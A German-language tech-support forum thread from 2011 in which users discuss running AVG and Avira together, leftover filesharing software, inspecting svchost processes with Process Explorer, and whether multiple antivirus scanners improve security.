Das sind keine Reste, AVG ist noch komplett installiert, nur dass alle Dienste und Autostart Einträge deaktiviert sind. (Leider starten zwei Prozesse trotzdem bei jedem Neustart dennoch mit, diese lasse ich per Batch, dann auch gleich wieder killen. Würde gerne wissen, wo die sich einnisten, da sie weder in den Diensten, in der Aufgabenplanung noch in den Registry Autostart Einträgen zu finden sind -.-)
Über diese Methode läuft nur Antivir im Hintergrund und wenn ich meinen PC genau scannen will, dann schalt ich Antivir aus und AVG an, da sich die Suchmuster der beiden Antiviren Programme stark unterscheiden und AVG meist mehr findet, jedoch Avira den PC im Betrieb nicht so stark ausbremst.

Zitat:

Zitat von cosinus

Ähem, Filesharing erzeugt erst recht viele Verbindungen, also muss man sich da nicht wundern.
Beachte, dass Filesharing generell ein Risiko darstellt, je nachdem was für Software man sich da zieht. Es ist völlig i.O. wenn man zB sich Linuximages über die vom Distributor zur Verfügung gestellten Torrents runterlädt, etwas ganz anderes ist es, wenn man sich diverese illegale Software mit Cracks und Keygen "besorgt"

Keine Sorge, ich benutze seit ca. 5 Jahren kein Filesharing mehr. Da könnte ich auch noch 100 Gründe aufzählen, warum man das nicht machen sollte.
Eigentlich habe ich das Programm deinstalliert, anscheinend sind noch Reste vorhanden -.-. Wollte es nur mal testen, da es das I2P Netzwerk unterstützt und es mich interessiert hat, was für ein Dateien Angebot dieses Netzwerk schon bietet und wie die Geschwindigkeit ist wenn man innerhalb dieses Netzwerks etwas herunter lädt.

cosinus · 07.09.2011, 09:00

Zitat:

Kann es sein, dass das Programm mit 64Bit Betriebssystemen nicht klar kommt und die .dll Dateien eigentlich woanders z.B im Ordner SysWOW64 liegen?

Damit müsste ich mal mal näher mit beschäftigen, svchost(process)analyzer hab ich noch nicht verwendet, war auch nur als Idee/Anstoß für gedacht - sehr gut kann man aber auch schon die svchost-Instanzen mit dem ProcessExplorer sehen.

Zitat:

Das sind keine Reste, AVG ist noch komplett installiert,

Würde ich komplett lassen. Wenn dann nur einen Virenscanner eines solches "Kalibers" wie AVG oder AntiVir, und wenn man sich eine zweite oder dritte Meinung holen will, nimmt man die normalerweise mit einem auf dem System installierten Virenscanner verträglichen Tools Malwarebytes, Superantispyware oder dem Onlinescanner von ESET.

N33DH33LP · 08.09.2011, 13:52

Zitat:

Zitat von cosinus

Damit müsste ich mal mal näher mit beschäftigen, svchost(process)analyzer hab ich noch nicht verwendet, war auch nur als Idee/Anstoß für gedacht - sehr gut kann man aber auch schon die svchost-Instanzen mit dem ProcessExplorer sehen.

Meinst du mit ProcessExplorer diesen hier: hxxp://technet.microsoft.com/de-de/sysinternals/bb896653
oder einfach den Windows eigenen Taskmanager? In dem Taskmanager bekomme ich nämlich nicht wirklich viele Infos über die svchost.exe

Zitat:

Zitat von cosinus

Würde ich komplett lassen. Wenn dann nur einen Virenscanner eines solches "Kalibers" wie AVG oder AntiVir, und wenn man sich eine zweite oder dritte Meinung holen will, nimmt man die normalerweise mit einem auf dem System installierten Virenscanner verträglichen Tools Malwarebytes, Superantispyware oder dem Onlinescanner von ESET.

Ich mache das schon seit 2 Jahren, dass ich AVG und Antivir gleichzeitig installiere und habe nie Probleme damit, da AVG bei mir ja nicht im Hintergrund läuft und keins der beiden so hartnäckig wie Norten oder so ist. (Nachdem ich Norten neben Avira installiert habe konnte ich meinen Rechner nicht mehr hochfahren -.-).
Da es ja viel Malware gibt, die stark obfuscated ist oder einfach ziemlich neu ist, kann es sein, dass nur 1 von 30 Virenscannern diese erkennt und je mehr Scanner ich drüber laufen lasse, desto höher ist die Wahrscheinlichkeit, dass auch etwas gefunden wird.
Wenn ich einen komplett Scan mache, dann meist mit Avira, AVG, Spybot, Malwarebytes und Dr.Web. Wenn dann nichts gefunden wird, kann ich mir jedenfalls sicher sein, dass ich keine pub Malware auf dem Rechner habe. Vor gezielten und guten angriffen kann man sich mit AVs ja leider nicht schützt -.-, aber im Moment wüsste ich nicht wer sich diese Mühe machen sollte gezielt mich zu hacken

.

Nochmal zu dem Problem, dass AVG jedes mal zwei Prozesse startet, die ich immer mit einer Batch killen muss. Weist du wo diese sich befinden könnten? Da sie weder in der Registry, noch im Aufgabenplaner, noch in den Diensten zu finden sind.

cosinus · 08.09.2011, 14:34

Zitat:

oder einfach den Windows eigenen Taskmanager?

Dann hätte ich Taskmanager und nicht ProcessExplorer geschrieben

Zitat:

desto höher ist die Wahrscheinlichkeit, dass auch etwas gefunden wird.

Nö, bleibt immer noch reiner Zufall. Man erhöht nicht die SIcherheit durch das Installieren von zig Virenscanner und sinnfreien Desktop-Firewalls. Das Grundkonzept an sich muss schon stimmig sein, so dass dies schon Infektionen ausschließt bzw. das Risiko auch OHNE Virenscanner verschwindend klein bleibt.

Zitat:

aber im Moment wüsste ich nicht wer sich diese Mühe machen sollte gezielt mich zu hacken

Dann versteh ich erst recht die Benutzung von 2 AVPs nicht. Alternativen hab ich ja genannt, OnlineScanner ESET und Malwarebytes als FreeVersion zusammen mit einem lokal installierten Virenscanner wie AVG, Avast, AntiVir oder Microsoft Security Essentials.

Ich hab auf meiner Büchse nur noch die Windows-Firewall und Malwarebytes an, aber das WindowsXP nutzt nur noch meine Freundin ich selbst nutze nur noch zu Hause Linux, zZt. Ubuntu 10.10 Maverick x86_64. Beruflich muss ich mich aber sehr viel mit Windows beschäftigen, aber mit Linux auch

cosinus · 08.09.2011, 16:04

Ja, das ist schon ein Riiiiiiiesenachteil unter Linux, dass man da keine gecrackten Programme nutzen kann

08.09.2011, 16:04	#15
cosinus /// Winkelfunktion /// TB-Süch-Tiger™	Firewall7Control "WSH Default Inbound Block Incoming" Ja, das ist schon ein Riiiiiiiesenachteil unter Linux, dass man da keine gecrackten Programme nutzen kann __________________ Logfiles bitte immer in CODE-Tags posten

Firewall7Control "WSH Default Inbound Block Incoming"

Antiviren-, Firewall- und andere Schutzprogramme: Firewall7Control "WSH Default Inbound Block Incoming"